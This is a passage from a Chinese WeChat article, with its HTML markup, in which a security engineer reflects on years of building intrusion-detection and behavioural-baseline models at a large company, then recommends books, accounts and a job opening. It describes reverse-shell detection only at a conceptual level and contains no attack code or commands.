UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">如何防止绕过？</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">静态命令特征、动态进程派生特征、网络连接特征、网络通讯特征。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">从命令、进程、网络、流量等多个维度纵深监测。</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">….</span></p></li></ul><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">当大盘梳理完整后，就进入到了一个“下笔如有神”的阶段。因为反弹shell属于攻击特征非常明显的高危动作，整体建模逻辑比较简单直接，通过专家特征匹配即可。规则的编写、验证、验收工作，以非常快的速度完结了。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">但新的问题又浮现出来，反弹shell只是攻击者的众多手法之一，还有非常多的手法没有覆盖，每种手法有可能依赖不同的数据源。这么多事情，应该先做啥？做我刚研究过的Rootkit和后门检测？</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">迷茫的时候，领导带着光出现，再次发出灵魂拷问：常规攻击者通常会使用哪些手法？历史攻击我司的攻击者又是用了哪些手法？目前对这些手法的覆盖率如何？未覆盖的手法做起来的难度和收益如何评估？</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">于是又花了一两周去做分析和复盘，当时或多或少会觉得有些浪费时间，但现在回想起来才觉得这个环节至关重要。这和反弹shell的大盘梳理是类似的逻辑，先明确全局视野、评估各个细分事项的投入，再结合内外部的攻击态势，判断某项工作最终能带来的收益，从而决定是否投入。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我们可以做容易的事情，不抬头望天只埋头苦干；也可以做所谓“困难”的事情，追求高级手法以提升个人知识技能。运气好的时候可能没什么太大的差异，但时间久了总会有失利的时候，花了许多时间去解决的问题不是主要矛盾，做出来的模型极少有检出，对整体的安全能力贡献极少，长期以往个人的提升也会受限。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">M公司有句老话，讲得非常精准——“坚持做正确的事，而不是容易的事”。</p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/SfhB0IDvicQmvKVCpCVef54vCgBah8ibXNaunq6VcAib4s5XhjLynQocmz1kic7J1D1heTJaJJIv1y6icusxOF6BnMA/640?wx_fmt=png" data-cropx1="0" data-cropx2="240" data-cropy1="53" data-cropy2="240" data-galleryid="" data-ratio="0.7833333333333333" data-s="300,640" style="width: 240px;height: 187px;" data-type="jpeg" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=e85b6178&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXN03GZ2x8bQicOIApMePKHa8Ylsls1kJia3BiaNFwWIMRKcnIbDRVIOjQdQ%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">仰望完星空，接下来就要脚踏实地。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">经过一通分析和对标，得出来了结论：xx攻击手法是历史上出现频次最多的，也是检出效果比较差的，需要高优先级做行为模型的建设，对业务历史行为生成基线，对入侵行为做异常对比（非白即黑）。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">虽然行为模型的逻辑相对清晰，也有比较成熟的业界实践。但真正要在数十万机器量级产生的大数据背景下，把所有的业务操作记录下来并进行实时匹配，并且还要控制误报的量级在人力可运营的范围内（当时的要求是&lt;=10条误报/天），还是一件非常困难的事情。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我拿起hive和jupyter两把小工具，琢磨分析了几个星期的离线数据，怎么也找不到一个合适的方法控制告警量级，业务总有各种奇奇怪怪的使用方式。建模工作一度陷入瓶颈，好几个星期的周报都是“分析数据进行中，预计下周完成”。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">下周复下周，下周何其多。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">领导再再次出现，很快帮助我理清了思路，确定了迭代的方向——不要妄图一口吃成个胖子，直接做一个完美的通用模型出来，而是先圈定一个小范围，把这部分的问题迭代解决完之后，再逐步扩大范围，最终完成既定目标。</p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7068548387096775" data-s="300,640" style="width: 329px;height: 233px;" data-type="png" data-w="2480" src="https://wechat2rss.xlab.app/img-proxy/?k=ef43b0f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXNpx8fpnddcrkAIemZmF5beb07qicbGTxadwePdt5Hic9O0WMCRWVJr0CQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;margin-bottom: 0em;"><br/></p><p style="margin-bottom: 0px;">靠着持续迭代的思想，行为模型逐渐完善，在近几年的入侵检测中贡献了非常多的检出率，在内部的攻防对抗中，攻击者（更熟悉我们的能力）需要非常谨慎以及要采用更高级的手段来绕过感知，大幅提升了攻击门槛。保障关键项目持续有进展，也成为了领导对我后续工作的要求，对我助益良多。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;"><span style="font-size: 20px;"><strong>五、总结展望</strong></span></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">回顾在M公司这三年，值得一写的事情远不止这些。但真正能写出来、对外公开的内容非常有限。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我学会了如何在海量数据下建设纵深防御体系，视野上，在对标盘点的过程中了解了行业Top公司安全建设的迭代路径，知道如何往“业界最佳实践”靠拢；实操上，熟练使用实时、离线多种分析方式，做出来的模型也检出了无数次内外部入侵。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我学会了如何应急止损、快速定位并解决当前入侵风险，并利用各类数据完成溯源，确保历史上没有因同类问题导致的入侵行为。我学会了如何深入复盘并持续迭代能力，从事前建设、事中感知、事后溯源多个维度Review能力缺陷，并推动各方完成迭代更新。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我学会了如何推动合作团队共同完成目标，在遇到分歧时求同存异，在进展受阻时及时干预引导，在正确的时机上升对齐，推动流程完善以确保高质量交付。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">我学会了...</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">目前取得的一些微小成果，有很多运气成分在里面，没有被顶尖的黑客团队盯上；也仰仗于专业的兄弟团队支持，在保障采集能力稳定运行的同时，没有因灰度对业务产生严重影响；同时也依赖于领导的“教练辅导”，在我方向不清晰、实施过程有阻塞点的时候，及时出现并引导我走向正确方向。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">在这几年的工作中，有一些关键认知迭代，与诸位共勉：</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p>Agent基建与数据分析的能力，没有哪一部分是能一蹴而就的，也不存在先后关系，都在相互纠缠中慢慢成长完善。</p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">专业的人做专业的事儿，而两个专业团队相互协作的力量，是1+1&gt;2。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">研发同学擅长于解决稳定性、性能、采集方案等问题，安全同学对数据分析、攻击手法、建模思路更熟悉，协作一致才能形成更强大的力量。</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">方向比努力更重要，坚持做正确的事，而不是容易的事。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">如果摸不清楚方向，不如花一些时间抬头看路，在错误的方向上少走几步，也能算是阶段性的胜利。</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">个人能力的成长也需要“迭代”提升。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">《刻意练习》讲过：</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">所谓“天真的练习”，基本上只是反复地做某件事情，并指望只靠那种反复，就能提高表现和水平，但这只会让你在现状中显得更深。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">而“正确的练习”，需要好导师、有目标、有反馈，才能不断走出舒适区，最终变成业内杰出人物。</span></p></li></ul><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">总结完过去，接下来就是展望未来。</p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5501792114695341" data-s="300,640" style="" data-type="png" data-w="2232" src="https://wechat2rss.xlab.app/img-proxy/?k=65a306b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXNAicfOiafSvvZCfudmNJoZGu62fA9utDSCXicyibTK4scmXCJtQTknbHXZA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">上图摘自今年Google云安全峰会的议题——《Taking an autonomic approach to security operations》，主要讲Google在做反入侵的时候，在数据采集、数据分析、响应处置、反馈提升四个大的阶段持续迭代，尤其是做了很多自动化处置的事情，以降低成本、更高效的运营闭环，最终提升安全能力。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">Google是安全行业内的标杆，近几年发布的多篇安全白皮书也非常经典，一直在反复强调云原生安全的重要性。与上述议题结合起来看，随着外挂式安全建设的自动化、平台化能力越来越强，节省下来的人力投入到云原生安全方向，也是自然而然的事情。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">以往我司大多数时间在做外挂式安全，已经有了一定的成熟度，也沉淀了很多平台化的能力（当然离Google还有一些距离）。依托这些能力，我们可以快速完成数据采集、分析建模、上线运营等流程，安全同学更专注于攻击手法和策略逻辑，效率也大大提升。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">随着云原生的持续发展落地，我司也在逐渐往云原生安全的方向建设，把安全能力更早的内置到业务逻辑里。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">这是一个关键的转折点，我非常期待在新篇章里去经历新的故事，与公司共同成长。</p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;"><strong><span style="font-size: 20px;">六、碎碎念</span></strong></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">站在巨人肩膀上，看到更远更广阔的世界。文末来推荐几本经典书籍：</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">《金字塔原理》：</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">写作基本功，如何更清晰、更有条理的表述</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">《非暴力沟通》：</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">沟通基本功，在推动类的工作中非常重要的基本法则</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">《刻意练习》：</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">如何成为大师，成长方法论</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">《领导梯队》：</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">了解自己处于什么位置，以及可能的成长路线</span></p></li><li><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">《高效能人士的七个习惯》、《可复制的领导力》、《人性的弱点》、《你不可不知的人性》：</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">一些优秀的职场素养，软素质、情商相关</span></p></li></ul><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">也推荐几个优秀的公众号：</p><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MjM5NjQ5MTI5OA==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/hEx03cFgUsVGibnsaEib3aNlqF0tOrA2RGEmNSbia2nnohE4Tpf95UyTiaSjDVbHRfY8WNBeTuLLTaVdSckkNyEx1Q/0?wx_fmt=png" data-nickname="美团技术团队" data-alias="meituantech" data-signature="10000+工程师，如何支撑中国领先的生活服务电子商务平台？数亿消费者、数百万商户、2000多个行业、几千亿交易额背后是哪些技术在支撑？这里是美团、大众点评、美团外卖、美团配送、美团优选等技术团队的对外窗口。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzU0MDcyMTMxOQ==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/icqm3vRUymZl2PzcJhVGmBDWwFv1InwmicGHiaKiaIHUjMldX298CyiazWE3MuBXqqC4jDgwIszbmSnUmxWdnWP7Tng/0?wx_fmt=png" data-nickname="甲方安全建设" data-alias="blueteams" data-signature="甲方安全建设的点滴，共同学习，一起进步。 笔耕不辍也是对自我的督促。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzAwMzAwOTQ5Nw==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/4WwicSnkicVGdPIP5k6Duo2vyIJxaYC0Ba4s03HxHhspOPkVhcWcDArrCvJZs89A1JfFtibnIeXIrapDkBsZP73ww/0?wx_fmt=png" data-nickname="安全小飞侠" data-alias="AvFisher" data-signature="长期积累、总结分类、深度思考、落地实践，记录一个普通网安从业人员的所感所想！" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzA5Mzg3NTUwNQ==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/rrT9ZWSiaWae9L0Kz9kQ3BsQJhKJjTYjfPdvvvFHNm6OOcYicmS69XyxdXuA6sDttlmhicJ45jQB4YIJFCfTQIVEg/0?wx_fmt=png" data-nickname="安全乐观主义" data-alias="" data-signature="实践分享企业在建设安全开发生命周期各阶段及流程中的优秀实践，内容涉及代码审计、业界对标、系统工程化心得、国外资料分享，搭建应用安全交流平台。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzA4MDU0NzY4Ng==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/5AsxricGekWjVicjXViaZnyuTOrEtYLjicjeYC34JULqNhSczJD24n66bQNGzXibOyuJnXFUG8WiaaMia0dpiaUnUdelDA/0?wx_fmt=png" data-nickname="代码审计" data-alias="white-hat-note" data-signature="这里是phith0n的公众号，分享和代码相关的所有问题，不仅限于代码安全。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzI2MjQ1NTA4MA==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/yXsxtS2cfwbbrvrPJc9bTvZFr7n5ZgdWsRKc2GvxcQNogPzLOcveKPP2vpaicqWsRiaASYeEsbAYNsDUWPQ6pyeg/0?wx_fmt=png" data-nickname="君哥的体历" data-alias="jungedetili" data-signature="闲暇时间，逼迫自己，记录分享体验与经历，不求正确统一，但求真、善、美。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="Mzg4NTc0MjAwMg==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/sAds7Hl9rO7xGRS4oiaxzejIf5cVYWp4ia695icibicrGQTZUsdzXQnDhibUMg06FMPfrvvGbRfMufoyAAH7as17yU6w/0?wx_fmt=png" data-nickname="朴实无华lake2" data-alias="lake20220220" data-signature="生活就是这么朴实无华，且枯燥" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzI1NTc1NTcwNg==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/jEESHeKDyVxhtbAawicDNOVJB5zLyiaibU8WAjT97QyuTCNoCXIlq0o7fYIMu3Tp1Pw7fZQicTYGHKOib7EmCa4tUVA/0?wx_fmt=png" data-nickname="灾难控制 局" data-alias="SecDamageControl" data-signature="这里是灾难控制局,紧急紧急联系电话:127.0.0.1" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzIwODIxMjc4MQ==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/ttTDFzozho4UFHP8A0f2s9fa8LrWVZ5Ny8OeCgb1h3X8YV9CgSVpiaPRzvYlEg0WfFQ4udBAxENnFA7hib7x9D0Q/0?wx_fmt=png" data-nickname="七夜安全博客" data-alias="qiye_safe" data-signature="和七夜一起去探索人生的星辰大海，技术人并不只有技术，你要的人生成长与自由在这里" data-from="0" data-is_biz_ban="0"></mp-common-profile><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-align: justify;"></span></section><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">欢迎加我微信一起交流HIDS和反入侵建设的经验。</p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/SfhB0IDvicQmvKVCpCVef54vCgBah8ibXNTtcYSr53FDavvicxet8ylafVosibvsB8o4ibZP3EnWKOY9UY3fjQNzib3Q/640?wx_fmt=jpeg" data-cropx1="104.14285714285714" data-cropx2="956.5714285714286" data-cropy1="289.2857142857143" data-cropy2="1161" data-galleryid="" data-ratio="1.0246478873239437" data-s="300,640" style="width: 221px;height: 226px;" data-type="jpeg" data-w="852" src="https://wechat2rss.xlab.app/img-proxy/?k=38711793&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FSfhB0IDvicQmvKVCpCVef54vCgBah8ibXNODv9Lk2XHPhEv5Pf7GcQNxXGl3hpdTXaqFsov5gBDouDliat2ScW6WA%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-bottom: 0px;"><br/></p><p style="margin-bottom: 0px;">最后打个小广告，如果你想从事反入侵工作、希望能在此领域深耕，我们恰好在找一路同行的伙伴，欢迎来试试看。</p><section powered-by="xiumi.us" style="margin: 25px 0px 10px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: normal;text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;visibility: visible;"><section data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" data-style="display: inline-block; width: auto; vertical-align: top; background-color: rgb(250, 245, 221); min-width: 10%; max-width: 100%; flex: 0 0 auto; height: auto; align-self: flex-start; box-sizing: border-box;" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;background-color: rgb(250, 245, 221);display: inline-block;width: auto;vertical-align: top;min-width: 10%;flex: 0 0 auto;height: auto;align-self: flex-start;color: rgb(25, 25, 25) !important;visibility: visible;"><section powered-by="xiumi.us" data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" style="margin: -9px 0px 5px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;display: flex;flex-flow: row nowrap;justify-content: flex-start;visibility: visible;"><section data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;display: inline-block;vertical-align: top;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;visibility: visible;"><section powered-by="xiumi.us" data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"><section data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" data-darkmode-color-16609009164016="rgb(173, 125, 2)" data-darkmode-original-color-16609009164016="#fff|rgb(253, 188, 24)" data-style="color: rgb(253, 188, 24); font-size: 15px; padding: 0px 13px; line-height: 1; letter-spacing: 0px; text-align: justify; box-sizing: border-box;" style="margin: 0px;padding: 0px 13px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;color: rgb(253, 188, 24);font-size: 15px;line-height: 1;letter-spacing: 0px;text-align: justify;visibility: visible;"><p data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" data-darkmode-color-16609009164016="rgb(173, 125, 2)" data-darkmode-original-color-16609009164016="#fff|rgb(253, 188, 24)" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;text-align: left;white-space: normal;visibility: visible;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 18px;visibility: visible;"><strong data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" data-darkmode-color-16609009164016="rgb(173, 125, 2)" data-darkmode-original-color-16609009164016="#fff|rgb(253, 188, 24)" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"><span data-darkmode-bgcolor-16609009164016="rgb(195, 191, 172)" data-darkmode-original-bgcolor-16609009164016="#fff|rgb(250, 245, 221)" data-darkmode-color-16609009164016="rgb(173, 125, 2)" data-darkmode-original-color-16609009164016="#fff|rgb(253, 188, 24)" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;font-size: 18px;letter-spacing: 0px;text-align: justify;visibility: visible;">入侵对抗工程师/专家 </span></strong></span></p></section></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: normal;display: flex;flex-flow: row nowrap;text-align: left;justify-content: flex-start;visibility: visible;overflow-wrap: break-word !important;"><section data-style="display: inline-block; width: auto; vertical-align: top; border-left: 1px dashed rgb(253, 188, 24); border-bottom-left-radius: 0px; flex: 100 100 0%; align-self: flex-start; height: auto; margin: 0px 0px 0px 10px; box-sizing: border-box;" style="margin: 0px 0px 0px 10px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;border-left: 1px dashed rgb(253, 188, 24);display: inline-block;width: auto;vertical-align: top;border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;visibility: visible;"><section powered-by="xiumi.us" style="margin: 0px 0px 11px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"><section style="margin: 0px;padding: 0px 